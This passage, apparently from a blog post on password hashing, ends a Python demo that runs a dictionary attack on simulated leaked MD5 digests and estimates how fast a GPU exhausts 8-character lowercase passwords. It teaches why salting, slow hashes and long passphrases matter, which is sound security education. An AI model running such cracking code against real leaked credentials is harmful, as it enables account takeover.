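    """Per-user salt: the same password gives a different digest per user, so
    each candidate must be hashed once per account and precomputed tables are
    useless. Still not a proper password hash (see the note above)."""
    if salt is None:
        salt = secrets.token_hex(8)
    return salt, hashlib.md5((salt + password).encode("utf-8")).hexdigest()


if __name__ == "__main__":
    for digest, plain in dictionary_attack(LEAKED, WORDLIST).items():
        print(f"{LEAKED[digest]}: {plain}")
    rate = 2_000_000_000  # the post's figure for one modern GPU
    print(f"8 lowercase letters at {rate:,}/s: {seconds_to_exhaust(26, 8, rate):.0f} s")
```

Three of the four simulated accounts fall to a six-word list with trivial mangling; the passphrase does not, because no rule in `candidates` generates it, which is the whole argument for length over complexity. At the post's rate of 2 billion MD5s per second, every 8-character lowercase password is exhausted in under two minutes.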